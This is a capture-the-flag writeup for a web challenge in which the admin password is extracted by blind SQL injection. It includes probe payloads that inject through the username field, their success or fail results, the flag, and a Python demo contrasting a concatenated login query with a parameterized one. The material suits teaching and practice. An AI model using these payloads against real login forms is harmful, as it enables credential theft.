Web, 50 Points
Author: saisree
Writeup By: yctseng1227
It seems your login bypass skills are now famous! One of my friends has given you a challenge: figure out his password on this site. He's told me that his username is admin, and that his password is made of up only lowercase letters and numbers. (Wrap the password with tjctf{...})
The challenge gives us the username admin, and from the source code we can see the SQL statement and some of the column information, so we can guess that this challenge calls for blind SQL injection; some basic guessing approaches are covered in this article.
How to Guess?
Through SQL injection, using the login result to tell whether each probe succeeded, we find a way to extract the information we want via the username field.
For example, guessing the password length:
admin' and length(password) > 13 --
--> success
admin' and length(password) > 14 --
--> fail
admin' and length(password) = 14 --
--> success
So the password length is 14.
Another example, guessing the first character of the password:
admin' and unicode(substr(password, 1)) > unicode('a') --
--> success
admin' and unicode(substr(password, 1)) > unicode('b') --
--> fail
admin' and unicode(substr(password, 1)) = unicode('b') --
--> success
So the first character of the password is b.
Next comes writing the code; binary search can be combined with this to speed up the search, and the length of the returned response can be used to judge whether each probe succeeded.
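To show why the probes above work at all, here is an added example (not the challenge's code) that rebuilds the oracle locally: a constructed in-memory SQLite table with an admin row, a login query built by string concatenation that answers the writeup's three probes, and the same query with bound parameters, which answers none of them. The table layout and the wrong-password value are assumptions.

```python
import sqlite3

# Constructed demo database; the password is the value this writeup recovered,
# used here only so the oracle answers match the probes shown above.
DEMO_PASSWORD = "blindsqli14519"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (?, ?)", ("admin", DEMO_PASSWORD))
    return conn


def login_vulnerable(conn, username, password):
    # String concatenation lets the username field rewrite the WHERE clause;
    # the trailing '--' comments out the password comparison entirely, so the
    # login result becomes a yes/no answer to whatever condition was injected.
    sql = ("SELECT 1 FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone() is not None


def login_safe(conn, username, password):
    # Bound parameters: the same input is compared as data, never parsed as SQL,
    # so no injected condition is ever evaluated.
    sql = "SELECT 1 FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


# The three probes from the writeup, sent through the username field.
PAYLOADS = [
    "admin' and length(password) > 13 --",
    "admin' and length(password) > 14 --",
    "admin' and unicode(substr(password, 1)) = unicode('b') --",
]


def oracle_results(login):
    """Run the probes through a login function; True means the probe
    'succeeded', i.e. the injected condition leaked one bit of the password."""
    conn = make_db()
    return [login(conn, p, "wrong-password") for p in PAYLOADS]


if __name__ == "__main__":
    print("concatenated:", oracle_results(login_vulnerable))  # [True, False, True]
    print("parameterized:", oracle_results(login_safe))       # [False, False, False]
```

The concatenated version reproduces the success/fail pattern seen above (length 14, first character b); the parameterized version returns false for every probe while still accepting the real credentials.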
tjctf{blindsqli14519}